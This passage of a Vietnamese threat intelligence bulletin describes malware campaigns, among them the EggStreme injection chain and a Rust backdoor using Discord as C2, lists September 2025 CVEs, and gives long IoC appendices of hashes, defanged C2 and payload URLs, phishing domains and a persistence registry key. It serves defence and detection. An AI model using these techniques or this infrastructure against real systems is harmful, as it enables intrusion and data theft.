Để duy trì persistence, kẻ tấn công lạm dụng các dịch vụ Windows bị vô hiệu hóa bằng cách sửa key registry trỏ tới tệp nhị phân độc hại hoặc thay thế trực tiếp file thực thi, đồng thời cấu hình dịch vụ chạy với SeDebugPrivilege.Tệp nhị phân độc hại được các dịch vụ này thực thi có tên EggStremeLoader, chịu trách nhiệm đọc một tệp tại %WINDIR%\en-us\ielowutil.exe.mui — tệp này chứa cả EggStremeReflectiveLoader được mã hoá và payload EggStremeAgent. Sau khi giải mã reflective loader, tiêm loader đó vào tiến trình hợp pháp như winlogon.exe.

EggStremeReflectiveLoader sử dụng một mã thông báo từ tiến trình winlogon.exe để tạo ra một tiến trình mới ở trạng thái tạm dùng thường là MsMpEng.exe hoặc explorer.exe bằng cách sử dụng CreateProcessWithToken(). Sau đó, giải mã và tiêm payload cuối cùng EggStremeAgent vào tiến trình mới này. EggStremeAgent là một backdoor giao tiếp với máy chủ C2 sử dụng gRPC protocol, với nhiều tính năng như:

  • Thu thập thông tin chi tiết máy chủ
  • Liệt kê tài nguyên: quét tài nguyên cục bộ và mạng từ xa.
  • Leo thang đặc quyền: chiếm quyền cao hơn trên hệ thống.
  • Thực thi lệnh: chạy lệnh tùy ý trên hệ thống.
  • Rò rỉ dữ liệu: đánh cắp và truy xuất dữ liệu nhạy cảm.
  • Thao tác file/thư mục: tạo, xóa, sửa file
  • Process Injection: chèn mã vào các tiến trình đang chạy.

Sau khi xâm nhập hạ tầng qua backdoor giai đoạn đầu EggStremeFuel, kẻ tấn công chuyển sang thiết lập persistence ẩn. Để tránh bị phát hiện, nhóm lợi dụng các dịch vụ Windows hợp lệ mà thường không bật theo mặc định, nhằm che giấu hoạt động và duy trì truy cập tránh bị phát hiện

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến các chiến dịch tấn công

Khuyến nghị:

  • Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống

 

2         MALWARE

Tháng 09/2025, đội ngũ NCS ghi nhận các phân tích đáng chú ý về mẫu mã độc sau:

STT Tiêu đề Mô tả
1 Phân tích mẫu mã độc trong chiến dịch tấn công nhắm tới Việt Nam Phân tích mẫu mã độc trong chiến dịch tấn công nhắm tới các tổ chức tài chính, viễn thông tại Việt Nam

2.1     Phân tích mẫu mã độc trong chiến dịch tấn công nhắm tới Việt Nam

Trong quá trình hunting trên không gian mạng, Threat Intelligence NCS phát hiện các mẫu mã độc được đăng tải trên nền tảng chia sẻ và kiểm tra mã độc VirusTotal. Các tệp tin mã độc được nén ở định dạng zip, nghi ngờ rằng tệp tin được phát tán thông qua hình thức email phishing.

Giải nén tệp tin định dạng zip, bên trong chứa tệp tin giả mạo tài liệu PDF, thực chất đây là một tệp tin định dạng LNK (shortcut) nhằm lừa nạn nhân mở file để thực hiện các hành vi độc hại khác, cụ thể:

  • Lấy đường dẫn thư mục hiện tại, đồng thời xóa bỏ file LNK giả mạo
  • Tải một tệp tin PDF được lưu trữ trên amazon tại đường dẫn https[:]//wsbcard[.]s3[.]dualstack.us-east-1.amazonaws[.]com/test/THP.pdf
  • Tạo thư mục mới tại đường dẫn “C:\Users\Public\Music\SecurityCheck”, tải xuống một tệp tin nén khác có tên notepad.zip nằm cùng đường dẫn với địa chỉ ở trên, giải nén và xóa file zip
  • Thực thi file notepad.exe

File notepad.exe là mã độc được viết bằng ngôn ngữ Rust lạm dụng Discord làm C2 trong cho quá trình giao tiếp sử dụng thư viện Serenity, thư viện này hỗ trợ tương tác với các API của Discord. Các thông tin như Bot token và ServerID được mã hóa bằng thuật toán AES và base64.

Tải xuống các tài liệu decoy mà mã độc sử dụng để lừa người dùng, ghi nhận chiến dịch nhắm tới đơn vị tổ chức thuộc lĩnh vực tài chính ngân hàng tại Việt Nam.

Tiếp tục hunting và theo dõi, Threat Intelligence tiếp tục phát hiện các tài liệu giả mạo khác được triển khai cùng cách thức ở trên, một điểm đáng chú ý là một số file mã độc được lưu trữ ở một số trang web hợp pháp, nghi ngờ các máy chủ triển khai các trang web này cũng có thể đã bị tấn công để lưu trữ phần mềm độc hại. Các lĩnh vực được nhắm tới bao gồm tài chính ngân hàng và lĩnh vực viễn thông, dựa theo các tài liệu giả mạo

Thông tin các tài liệu giả mạo như sau:

THÔNG_BÁO_KIỂM_TRA_TÀI_CHÍNH_KHẨN_CẤP.pdf, Thong_bao_2025_10_01_Yeu_cau_giam_sat.pdf và 2557.KV6-TTKQ.pdf nhắm tới lĩnh vực tài chính ngân hàng

VPN_LDAP_huong_dan_su_dung_ver2.1.pdf nhắm tới lĩnh vực viễn thông

Indicator of Compromises (IoCs)

Chi tiết xem tại Danh sách IoCs liên quan đến mã độc

Khuyến nghị:

  • Thực hiện cập nhật các IoCs (mã hash, địa chỉ IP) vào các giải pháp bảo mật phía khách hàng nhằm nâng cao năng lực phòng thủ, giúp giám sát và phát hiện các dấu hiệu bất thường trên hệ thống

3         LỖ HỔNG BẢO MẬT

3.1      Microsoft Patch Tuesday – September 2025

Trong tháng 09, Microsoft đã phát hành các bản vá cho 80 CVE mới trong các sản phẩm của Windows và Windows Components, Office và Office Components, Microsoft Edge (Chromium-based), Azure, Hyper-V, SQL Server, Defender Firewall Service, và Xbox (yup – Xbox!). Trong đó có 08 lỗ hổng được đánh giá mức độ Critical, 72 lỗ hổng được đánh giá là Important.

Các lỗ hổng nổi bật ghi nhận trong tháng:

STT Mã CVE Tên lỗ hổng Thông tin chung Mức độ cảnh báo
         1 CVE-2025-55232 Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft High Performance Compute (HPC) Pack cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng mà không cần sự tương tác của người dùng Important
         2 CVE-2025-54910 Microsoft Office Remote Code Execution Vulnerability Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft Office cho phép kẻ tấn công thực thi mã từ xa mà không cần sự tương tác của người dùng. Preview Pane là attack vector của lỗ hổng này Critical
         3 CVE-2025-54918 Windows NTLM Elevation of Privilege Vulnerability Tồn tại lỗ hổng leo thang đặc quyền trên Windows NTLM cho phép kẻ tấn công leo thang lên đặc quyền SYSTEM trên hệ thống bị ảnh hưởng Critical
         4 CVE-2025-54897 Microsoft SharePoint Remote Code Execution Vulnerability Tồn tại lỗ hổng thực thi mã từ xa trên Microsoft SharePoint cho phép kẻ tấn công thực thi mã từ xa trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu xác thực Important

Khuyến nghị:

  • Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống

3.2    Ứng Dụng Web Và Các Sản Phẩm Khác

STT Mã CVE Tên lỗ hổng Thông tin chung Sản phẩm Mức độ cảnh báo
        1 CVE-2025-7775 Memory overflow vulnerability in NetScaler ADC and NetScaler Gateway Tồn tại lỗ hổng tràn bộ nhớ (memory overflow) dẫn đến thực thi mã từ xa hoặc từ chối dịch vụ (DoS) trên NetScaler ADC and NetScaler Gateway. Khai thác lỗ hổng yêu cầu thiết bị được cấu hình một trong các chế độ sau:

– Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy)

– AAA virtual server

– NetScaler ADC và NetScaler Gateway 13.1, 14.1, 13.1-FIPS và NDcPP: LB virtual servers (HTTP, SSL, hoặc HTTP_QUIC) với services IPv6/ DBS Ipv6 services hoặc servicegroups với IPv6 servers/ IPv6 DBS servers

– CR virtual server loại HDX

NetScaler ADC và NetScaler Gateway Critical
        2 CVE-2025-7776 Memory overflow vulnerability in NetScaler ADC and NetScaler Gateway Tồn tại lỗ hổng tràn bộ nhớ (memory overflow) có thể dẫn đến từ chối dịch vụ (DoS) trong NetScaler ADC và NetScaler Gateway. Khai thác lỗ hổng yêu cầu NetScaler được cấu hình chế độ Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) với PCoIP Profile  NetScaler ADC và NetScaler Gateway High
        3 CVE-2025-8424 Improper access control on the NetScaler Management Interface Tồn tại lỗ hổng access control trên giao diện quản lý NetScaler của NetScaler ADC và NetScaler Gateway. Khai thác lỗ hổng yêu cầu kẻ tấn công có quyền truy cập vào NSIP, Cluster Management IP, local GSLB Site IP hoặc SNIP với quyền truy cập quản lý NetScaler ADC và NetScaler Gateway High
        4 CVE-2025-9712/

CVE-2025-9872

Ivanti Endpoint Manager Remote Code Execution Vulnerability Tồn tại lỗ hổng trong Ivanti Endpoint Manager cho phép kẻ tấn công không cần xác thực thực thi mã từ xa trên hệ thống bị ảnh hưởng. Khai thác lỗ hổng yêu cầu tương tác từ người dùng Ivanti Endpoint Manager High

Khuyến nghị:

  • Thực hiện rà soát và lên kế hoạch cập nhật các bản vá theo hướng dẫn của hãng để đảm bảo an toàn an ninh thông tin hệ thống

4       PHỤ LỤC

Danh sách các IoC liên quan đến các mã độc/ chiến dịch tấn công mới xuất hiện trong tháng 09/2025.

4.1    Danh sách IoCs liên quan đến các chiến dịch tấn công

4.1.1       Threat Actor Trung Quốc triển khai BadIIS trong chiến dịch SEO Poisoning nhắm mục tiêu khu vực Đông Nam Á

Indicators of Compromise (IoCs)

BadIIS implants SHA256 hashes:

01a616e25f1ac661a7a9c244fd31736188ceb5fce8c1a5738e807fdbef70fd60

bc3bba91572379e81919b9e4d2cbe3b0aa658a97af116e2385b99b610c22c08c

5aa684e90dd0b85f41383efe89dddb2d43ecbdaf9c1d52c40a2fdf037fb40138

c5455c43f6a295392cf7db66c68f8c725029f88e089ed01e3de858a114f0764f

82096c2716a4de687b3a09b638e39cc7c12959bf380610d5f8f9ac9cddab64d7

ed68c5a8c937cd55406c152ae4a2780bf39647f8724029f04e1dce136eb358ea

6d79b32927bac8020d25aa326ddf44e7d78600714beacd473238cc0d9b5d1ccf

b95a1619d1ca37d652599b0b0a6188174c71147e9dc7fb4253959bd64c4c1e9f

8078fa156f5ab8be073ad3f616a2302f719713aac0f62599916c5084dd326060

a73c7f833a83025936c52a8f217c9793072d91346bb321552f3214efdeef59eb

6d044b27cd3418bf949b3db131286c8f877a56d08c3bbb0924baf862a6d13b27

78ef67ec600045b7deb8b8ac747845119262bea1d51b2332469b1f769fb0b67d

78ef67ec600045b7deb8b8ac747845119262bea1d51b2332469b1f769fb0b67d

88de33754e96cfa883d737aea7231666c4e6d058e591ef3b566f5c13a88c0b56

a393b62df62f10c5c16dd98248ee14ca92982e7ac54cb3e1c83124c3623c8c43

40a0d0ee76b72202b63301a64c948acb3a4da8bac4671c7b7014a6f1e7841bd2

40a0d0ee76b72202b63301a64c948acb3a4da8bac4671c7b7014a6f1e7841bd2

1c870ee30042b1f6387cda8527c2a9cf6791195e63c5126d786f807239bd0ddc

271c1ddfdfb6ba82c133d1e0aac3981b2c399f16578fcf706f5e332703864656

22a9e1675bd8b8d64516bd4be1f07754c8f4ad6c59a965d0e009cbeaca6147a7

e2e00fd57d177e4c90c1e6a973cae488782f73378224f54cf1284d69a88b6805

23aa7c29d1370d31f2631abd7df4c260b85227a433ab3c7d77e8f2d87589948f

ab0b548931e3e07d466ae8598ca9cd8b10409ab23d471a7124e2e67706a314e8

22a4f8aead6aef38b0dc26461813499c19c6d9165d375f85fb872cd7d9eba5f9

de570369194da3808ab3c3de8fb7ba2aac1cc67680ebdc75348b309e9a290d37

d8a7320e2056daf3ef4d479ff1bb5ce4facda67dfc705e8729aeca78d6f9ca84

d6a0763f6ef19def8a248c875fd4a5ea914737e3914641ef343fe1e51b04f858

c6622e2900b8112e8157f923e9fcbd48889717adfe1104e07eb253f2e90d2c6a

6cff06789bf27407aa420e73123d4892a8f15cae9885ff88749fd21aa6d0e8ad

ASPX file handler SHA256 hash:

b056197f093cd036fa509609d80ece307864806f52ab962901939b45718c18a8

Managed IIS Module SHA256 hash:

2af61e5acc4ca390d3bd43bc649ab30951ed7b4e36d58a05f5003d92fde5e9a7

PHP file handler SHA256 hash:

36bf18c3edd773072d412f4681fb25b1512d0d8a00aac36514cd6c48d80be71b

C2 URLs

hxxp://103.6.235[.]26/xvn.html

hxxp://x404.008php[.]com/zz/u.php

hxxp://103.6.235[.]78/vn.html

hxxp://x404.008php[.]com/index.php

hxxp://103.6.235[.]78/index.php

hxxp://103.6.235[.]78/zz/u.php

hxxp://cs.pyhycy[.]com/index.php

hxxp://cs.pyhycy[.]com/zz/u.php

hxxps://sl.008php[.]com/kt.html

hxxp://160.30.173[.]87/zz/u.php

hxxp://404.pyhycy[.]com/index.php

hxxp://404.pyhycy[.]com/zz/u.php

hxxp://404.hao563[.]com/index.php

hxxp://404.300bt[.]com/zz/u.php

hxxp://404.yyphw[.]com/index.php

hxxp://103.6.235[.]26/kt.html

hxxp://404.yyphw[.]com/zz/u.php

hxxp://404.hzyzn[.]com/index.php

hxxp://404.hzyzn[.]com/zz/u.php

hxxp://404.300bt[.]com/index.php

hxxp://103.248.20[.]197/index.php

hxxp://103.248.20[.]197/zz/u.php

hxxps://fb88s[.]icu/uu/tt.js

hxxp://404.hao563[.]com/zz/u.php

hxxp://www.massnetworks[.]org

hxxp://vn404.008php[.]com/index.php

hxxp://vn404.008php[.]com/zz/u.php

hxxp://404.008php[.]com/zz/u.php

4.1.2       Android Banking Trojan giả mạo các ứng dụng hợp pháp

Indicators of Compromise (IoCs)

asdrjswer678[.]com

asociaciondehotelesdemexico[.]com

bocongan-congdichvucong[.]com

bps-ikd[.]com

bpsikd[.]com

brightter-efg[.]com

brightter-ysl[.]com

capnhat-etvn[.]cc

capnhatdulieu-et[.]com

care-ind[.]cc

chinhphutt[.]com

cong-dich-vu-cong-quoc-gia[.]com

cong-dichvucong[.]com

congdichvu[.]cc

congdichvu[.]vip

congdichvucong-bocongan[.]com

congdichvucong-quocgia-dvc[.]com

congdichvucong-quocgia[.]com

congdichvucong[.]cc

congdichvucongbocongan[.]com

congdichvucongdancuquocgia[.]cc

congdichvucongdancuquocgia[.]com

congdichvucongquocgia[.]com

coring-ind-care[.]cc

coring-ind-care[.]com

cpvn-eta[.]cc

cski-evn[.]cc

dich-vu-cong[.]com

dichvucong-dvc-quocgia[.]cc

dichvucong-qg[.]com

dichvucong-quoc-gia[.]com

dichvucong-quocgia[.]cc

dichvucong-quocgia[.]com

dichvucongquocgia[.]com

dichvuquocgia[.]com

dichvuquocgia[.]org

digital-idn[.]com

dirjenpajak-caring-idn[.]com

dirjenpajak-idn-caring[.]com

djp-idn-pajak[.]cc

djp-mpajak-idn[.]cc

djp-mpajak-idn[.]cyou

djp-mpajak-idn[.]top

djpcare-mpajak-idn[.]cc

djpcare-mpajak-idn[.]com

djpcareloop[.]top

down-loadmpajakidn[.]com

download-djpidn[.]com

download-idnpajak[.]com

downloaddjpidn[.]com

downloadmpajakidn[.]com

downloadmpajakidn[.]vip

downloadpajak[.]cc

dulieu-etvn[.]cc

dvc-chinhphu[.]com

dvc-dichvucong[.]com

dvc-quocgia[.]cc

dvc-quocgia[.]com

dvc-quocgia[.]net

dvc-quocgia[.]org

dvcdichvucong[.]com

dvcqg[.]cc

dvcqg[.]org

dvcqg[.]vip

dvcquocgia[.]com

dvcvn-congdichvucongquocgia[.]cc

dvcvn-dichvucongquoccgla[.]online

dvcvn-dichvucongquocgla[.]online

dvcvn-dichvucongquocglaa[.]online

dvcvn-dichvucongquoocgla[.]online

dvcvn-trungtamdulieu[.]com

dxgjsgw[.]com

e-djp[.]com

e-ikd[.]com

e-pajak[.]cc

etx-dongbodulieu[.]com

evn-ctdl[.]cc

fbpsikd[.]click

hdgjgw[.]com

hosodongbo-etvn[.]cc

hsgjsgw[.]com

i-djp-pajak[.]com

icrossingappxyz[.]com

id-djp-dl[.]com

id-ektp[.]com

id-pemerintah[.]com

idmpajak[.]com

idn-digital[.]com

idn-dirjenpajak-caring[.]cc

idn-dirjenpajak-caring[.]com

idn-pajak-djp[.]cc

idn-pajak-djp[.]top

idngov[.]com

idnpajak[.]com

idnpajakdownload[.]com

iheartusnf6[.]com

ikddigital[.]online

ind-ikddps[.]cc

ind-ikddps[.]online

ind-ikddpzs[.]online

ind-ikddpzz[.]online

indiemusicacademi[.]com

japavest[.]com

japfunds[.]com

jfjygw[.]com

keelvari1[.]cc

m-djp-download[.]com

m-pajak[.]cc

m-pajak[.]vip

mpajak-djp-idn[.]cc

mpajak-djp-idn[.]top

mpajak-djp-idn[.]vip

mpajak-idn-download[.]cc

mpajak[.]cc

onlinedjp[.]com

onlinepajak[.]cc

outshine-byd[.]com

outshine-ryg[.]com

outshine-sem[.]com

pa-jak[.]org

pajakdownload[.]com

pemerimtahx[.]com

pemerintah[.]cc

phatnguoicsgt[.]com

registerktp[.]com

registerktp[.]online

toptraditional[.]com

topunfortunately[.]com

topviolent[.]com

ttcskhdl[.]cc

twmlwcs[.]cc

vietnamchinhphu[.]org

vncirclek[.]com

vndichvucongtructuyen[.]com

ykkadm[.]icu

ynhqhu[.]com

Hashes SHA256

0b7f4c3be1d0b0f0b53495ff33e8c4b22adf122e01f8c72d705c489a975fe498

a9358048b5f6e8e7c4b47bebd41991f9e33ccea6e9eb88d1c33dc6079ceb06b6

d4937d30853932bc0bf840bac79121e027ec7078395ec2c50d6392f1fed528f1

1f9253092c5a2abdb7bc3d93fccad85f23ce5bfde38377c792a242f045afcdb5

4be32b6417ee32b9da0b81e487f9e26503bd7086d95a4fb5fd8dd8ac1f328e5d

db0c223bc08108694e8185e0d8bcd32684e56ba251fb63a544c7eff293258079

9e38cc89cf22ff8f5a566c2069702dd89f55bc3f8a3caf96f0d9327256bdc791

e29c4a157ac2e1a233f9a59e63cb203fd8eac0595c452d93ed9b72e264dbc8f9

2386baafae215fee4c27b955dd6786a7d70d32e5d6eff54cfd8a1353d3d1b473

ec5b55d4829d043ed3998cc90f633fab5d37bcf5476c6b274eeba85b9f5baaa7

359a032427342b32bcd85a40e0f99496732f03bbce15aa0d8c92a2b9cfd493dc

14ce035b4bc33458612f3b692e9d9f3304e4eb0455c933452ec49d56549520c4

33939f391dab818e6bbda531f64280869adbaafc213c2f4773169f561c88f19f

e9d3f6211d4ebbe0c5c564b234903fbf5a0dd3f531b518e13ef0dcc8bedc4a6d

0de69fad50b9e0800ba0120fe2b2f7ebb414e1ae335149a77dae3544b0a46139

68fb18d67bb2314ff70a0fb42e05c40463cceb9657c62682179e62809429ad99

9ada0f54f0eaa0349c63759172848fcb1dd123d892ece8d74002f96d6f095a43

0d36bb982c7b4d7b309f34653af7f5abe80b1503971d9832d617c5f6b35f362c

d47246c9bd4961f692cef6e3d8cdc5aa5f64e16946104cc9c194eb47077fd897

4eb7a289af4ea7c65c4926e4b5e2c9ec3fb4d0b9cc425f704b7d1634c23a03a9

680eb952cfff2fb39563abc6321851f4b7e6a8014d09ed2744465bcb192562ce

b847b228ed7993136b390bdd6c4afaadc7a441afabf28524bd236e002cf58d47

f7a148d0da5bea32a823b27cf8c45e7532d5e0a964cc4a102fa006ea4ff7e64d

90aa611b5a258d36220afad46aa52f7496dc11211999ea84e0e7182dc3476aa5

e433744f2372bc1ef925007f1f2a17509b4a498472d68c671bb8849265c61475

4.1.3       GhostRedirector tấn công máy chủ Windows sử dụng Rungan backdoor và Gamshen IIS module

Indicators of Compromise (IoCs)

Files

SHA-1 Filename Detection Description
EE22BA5453ED577F8664CA390EB311D067E47786 SitePut.exe MSIL/Agent.FEZ Zunput, information collector and webshell installer.
677B3F9D780BE184528DE5967936693584D9769A EfsNetAutoUser.exe MSIL/HackTool.Agent.QJ A custom tool using the EfsPotato exploit to create a new user on the compromised server.
5D4D7C96A9E302053BDFAF2449F9A2AB3C806E63 NetAutoUser.exe MSIL/AddUser.S A custom tool using the BadPotato exploit to create a new user on the compromised server.
28140A5A29EBA098BC6215DDAC8E56EACBB29B69 miniscreen.dll Win64/Agent.ELA Rungan, a passive C++ backdoor.
371818BDC20669DF3CA44BE758200872D583A3B8 auto.exe Generik.KJWBIPC A tool to create a new user on the compromised server.
9DD282184DDFA796204C1D90A46CAA117F46C8E1 auto_sign.exe MSIL/Agent.XQL A tool to create a new user or deploy webshells on the compromised server.
87F354EAA1A6ED5AE51C4B1A1A801B6CF818DAFC EfsNetAutoUser.exe MSIL/HackTool.Agent.QJ A custom tool using the EfsPotato exploit to create a new user on the compromised server.
5A01981D3F31AF47614E51E6C216BED70D921D60 DotNet4.5.exe MSIL/AddUser.S Custom tool using BadPotato exploit to elevate privileges of an existing user.
6EBD7498FC3B744CED371C379BA537077DD97036 NetAUtoUser_sign.exe MSIL/AddUser.S Custom tool using BadPotato exploit to elevated privileges of an existing user.
0EE926E29874324E52DE816B74B12069529BB556 link.exe Win64/RemoteAdmin.GotoHTTP. A potentially unsafe application GoToHTTP tool.
373BD3CED51E19E88876B80225ECA65A5C01413F N/A PHP/Webshell.NWE Webshell.
5CFFC4B3B96256A45FB45056AE0A9DC76329C25A N/A ASP/Webshell.MP Webshell.
B017CEE02D74C92B2C65517101DC72AFA7D18F16 N/A PHP/Webshell.OHB Webshell.
A8EE056799BFEB709C08D0E41D9511CED5B1F19D N/A ASP/Webshell.UV Webshell.
C4681F768622BD613CBF46B218CDA06F87559825 N/A ASP/Webshell.KU Webshell.
E69E4E5822A81F68107B933B7653C487D055C51B N/A ASP/Webshell.UZ Webshell.
A3A55E4C1373E8287E4E4D5D3350AC665E1411A7 N/A ASP/Webshell.UY Webshell.
E6E4634CE5AFDA0688E73A2C21A2ECDABD5E155D N/A ASP/Webshell.UY Webshell.
5DFC2D0858DD7E811CD19938B8C28468BE494CB6 N/A ASP/Webshell.UX Webshell.
08AB5CC8618FA593D2DF91900067DB464DC72B3E ManagedEngine32_v2.dll Win32/BadIIS.AG Gamshen, a malicious IIS module.
871A4DF66A8BAC3E640B2D1C0AFC075BB3761954 ManagedEngine64_v2.dll Win64/BadIIS.CY Gamshen, a malicious IIS module.
049C343A9DAAF3A93756562ED73375082192F5A8 N/A MSIL/Agent.FFZ Comdai, a malicious multipurpose DLL used to create a malicious user.

Network

IP Domain Hosting provider First seen Details
N/A xzs.868id[.]com N/A 2024‑12‑03 GhostRedirector staging server, hosted on Cloudflare.
104.233.192[.]1 xz.868id[.]com PEG TECH INC 2024‑12‑03 GhostRedirector staging server.
104.233.210[.]229 q.822th[.]com
www.881vn[.]com
PEG TECH INC 2023‑10‑06 GhostRedirector staging server.
N/A gobr.868id[.]com N/A 2024‑08‑25 Gamshen C&C server, hosted on Cloudflare.
N/A brproxy.868id[.]com N/A 2024‑08‑25 Gamshen C&C server, hosted on Cloudflare.
43.228.126[.]4 www.cs01[.]shop XIMBO Internet Limited 2024‑04‑01 Comdai C&C server.
103.251.112[.]11 N/A IRT‑HK‑ANS N/A GhostRedirector staging server.

4.1.4       Nhóm tấn công ShadowSilk nhắm vào tổ chức chính phủ khu vực Trung Á và Châu Á – Thái Bình Dương

Indicators of Compromise (IoCs)

Panel JLIB \ Panel JLIB – web-panel—shell

hxxp://141[.]98[.]82[.]198:9942/     2025-01-09T21:32:44.981482+00:00

hxxp://88[.]214[.]26[.]37:9942/     2024-07-24T11:21:59.731143+00:00

Panel Morf Project – web-panel

hxxp://193[.]124[.]203[.]226:9942/     2024-09-25T17:59:18.896894+00:00

hxxp://81[.]19[.]136[.]241:9942/     2024-07-24T09:15:52.812127+00:00

File indicators (hash SHA1)

471e1de3e1a7b0506f6492371a687cde4e278ed8

ca12e8975097d1591cda08d095d4af09b05da83f

f385da641f2e506766a42dde81bb0fab13f845ee

fbbf624503001a981095356d1bd26bbf206a0df2

bcb1fd11b6b2f5046d4e5e8f714a8968d8a5d91d

ded2a5d2a7ebf3af1dc392c1af1e4b31fdc7cabc

0135f8420c61babee43625dbba2a23ef9a12477d

0279a25ee68fc23e91a353fbcd28f71c21e691fc

16bd4dc2befb4f64aaecf74818a347cd1a02c30d

04f2504f7f00f65e001709650affb90a86404e74

5731274d1e7f0131e055ec34530f05ee603ef03b

00bf14e8153778835f95b9255ae1658e37819f8d

c02dd4d05a75e038c633d7d62669f2e1484f4b76

55d214fa9aa4d17cdd222f7deb4c5ec7e71ed4be

c805c64a9e22f7ae3dea79f9215c60cdf32d87b8

4d1426c0e04056396f8526a42afbb42f869db85b

4e98b193d5539bf1ded86a6ddea696288f0a1a3e

9f4826cff6196b4a84fd9243fd6e6879c220b274

85bb5a95db5b088b3e2f2c9f308b91d21d81e04d

2cf77e48cf5699aac449c91552804e17edb04a71

97bab01611d34ae97c368bd2c852f155b7286134

dcb2d87b51de33f6d5fe53f777ad678c0af88a68

d840b0b3039be6cce673e6e07da5bd5e76628434

5e6254ebcf8ea518716c6090658b89960f425ab3

84fcc10fef6409c9f50d56bf4f17070b51149841

46bcac8ced15bf5bc1f2d9e463508273da6fa8e8

fb3db25d5dfe21e3c457756b8bd865c560323527

11b0b620d0f0c4269a191d4ad9fd2042fb5e9d6c

b8ddc728483f1fe251d6ab64b401f297d993be39

7006ff7361522f36a25fabd9b91cf755c42c8cd7

488066ea37be17a8103d414c2593c7abb108ae95

Network indicators

document[.]hometowncity[.]cloud

pweobmxdlboi[.]com

adm-govuz[.]com

document[.]webmailsession[.]com

mailboxdownload[.]com

inbox[.]docworldme[.]com

document[.]mailboxarea[.]cloud

auth[.]allcloudindex[.]com

mosreg[.]docworldme[.]com

ex[.]wincorpupdates[.]com

message[.]mailboxarea[.]cloud

admin[.]inboxsession[.]info

emails-cloud[.]com

openpdfllc[.]com

ss[.]qwadx[.]com

sss[.]qwadx[.]com

72[.]4[.]43[.]100

81[.]19[.]136[.]241

179[.]60[.]150[.]151

5[.]188[.]86[.]233

141[.]98[.]82[.]198

64[.]7[.]198[.]46

65[.]38[.]120[.]38

168[.]100[.]8[.]21

91[.]212[.]89[.]197

88[.]214[.]26[.]37

64[.]7[.]198[.]66

72[.]5[.]43[.]100

193[.]124[.]203[.]226

85[.]209[.]128[.]171

65[.]38[.]121[.]107

4.1.5       UNC6384 nhắm mục tiêu vào khu vực Đông Nam Á

Indicators of Compromise (IoCs)

File Hashes

Name Hash (SHA-256)
AdobePlugins.exe 65c42a7ea18162a92ee982eded91653a5358a7129c7672715ce8ddb6027ec124
20250509.bmp (MSI) 3299866538aff40ca85276f87dd0cefe4eafe167bd64732d67b06af4f3349916
cnmpaui.dll e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011
cnmplog.dat cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79
SOGU.SEC (memory only) d1626c35ff69e7e5bde5eea9f9a242713421e59197f4b6d77b914ed46976b933

Certificate Fingerprints / Thumbprints

Name Hash (SHA-1)
mediareleaseupdates[.]com c8744b10180ed59bf96cf79d7559249e9dcf0f90
AdobePlugins.exe eca96bd74fb6b22848751e254b6dc9b8e2721f96

Network Indicators

Name IOC
Landing Page https[:]//mediareleaseupdates[.]com/AdobePlugins[.]html
Javascript https[:]//mediareleaseupdates[.]com/style3[.]js
STATICPLUGIN https[:]//mediareleaseupdates[.]com/AdobePlugins[.]exe
MSI Package https[:]//mediareleaseupdates[.]com/20250509[.]bmp
Hosting IP 103.79.120[.]72
C2 IP 166.88.2[.]90
SOGU.SEC User Agent Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)

Host Indicators

Name IOC
Mutex Name KNbgxngdS
RC4 Key mqHKVbHWWAJwrLXD
Registry Key HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CanonPrinter=”%APPDATA%\cnmpaui.exe” 9 780
File Path %LOCALAPPDATA%\DNVjzaXMFO\
File Path C:\Users\Public\Intelnet\
File Path C:\Users\Public\SecurityScan\

 

4.1.6       Hive0154 nhắm mục tiêu vào khu vực Đông Nam Á

Indicators of Compromise (IoCs)

Indicator Indicator Type Context
f8b28cae687bd55a148d363d58f13a797486f12221f0e0d080ffb53611d54231 SHA256 Weaponized archive delivering Toneshell8
8132beeb25ce7baed0b561922d264b2a9852957df7b6a3daacfbb3a969485c79 SHA256 Weaponized archive delivering Toneshell8
d1466dca25e28f0b7fae71d5c2abc07b397037a9e674f38602690e96cc5b2bd4 SHA256 Weaponized archive delivering Toneshell8
1272a0853651069ed4dc505007e8525f99e1454f9e033bcc2e58d60fdafa4f02 SHA256 Weaponized archive delivering Toneshell8
b8c31b8d8af9e6eae15f30019e39c52b1a53aa1c8b0c93c8d075254ed10d8dfc SHA256 Weaponized archive delivering Toneshell7
7087e84f69c47910fd39c3869a706e55324783af8d03465a9e7bfde52fe4d1d6 SHA256 Weaponized archive delivering Pubload
38fcd10100f1bfd75f8dc0883b0c2cb48321ef1c57906798a422f2a2de17d50c SHA256 Weaponized archive delivering Pubload
69cb87b2d8ee50f46dae791b5a0c5735a7554cc3c21bb1d989baa0f38c45085c SHA256 PDF containing download URL for weaponized archive
564a03763879aaed4da8a8c1d6067f4112d8e13bb46c2f80e0fcb9ffdd40384c SHA256 Loader injecting Toneshell7
e4bb60d899699fd84126f9fa0dff72314610c56fffca3d11f3b6fc93fcb75e00 SHA256 Loader injecting Pubload
c2d1ff85e9bb8feb14fd015dceee166c2e52e2226c07e23acc348815c0eb4608 SHA256 Loader injecting Pubload
188.208.141[.]196 IPv4 Pubload C2 server
bdbc936ddc9234385317c4ee83bda087e389235c4a182736fc597565042f7644 SHA256 Toneshell8 backdoor
f0fec3b271b83e23ed7965198f3b00eece45bd836bf10c038e9910675bafefb1 SHA256 Toneshell8 backdoor
e7b29611c789a6225aebbc9fee3710a57b51537693cb2ec16e2177c22392b546 SHA256 Toneshell8 backdoor
